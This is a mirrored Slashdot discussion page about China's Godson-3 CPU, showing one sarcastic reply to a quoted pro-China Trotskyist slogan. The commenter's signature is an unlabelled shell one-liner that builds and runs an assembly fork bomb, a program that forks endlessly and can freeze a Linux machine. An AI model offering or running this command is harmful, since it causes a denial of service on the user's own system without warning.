Slashdot Mirror


A Chinese Challenge To Intel

motang writes "Chinese government funded Godson-3 a CPU that is developed to bring personal computing to majority of Chinese people by the year 2010. Will this pose any threat to Intel?"

1 of 364 comments (clear)

  1. Re:DEFEND CHINA! by Hal_Porter · · Score: 0, Redundant

    Trotskyists stand for the unconditional military defense of the Chinese deformed workers state against imperialist counterrevolution! For workers political revolution and soviet democracy in China, for new October socialist revolutions worldwide! Defeat the imperialist war drive against China!

    Thank you for giving us the benefit of your views.

    --
    echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;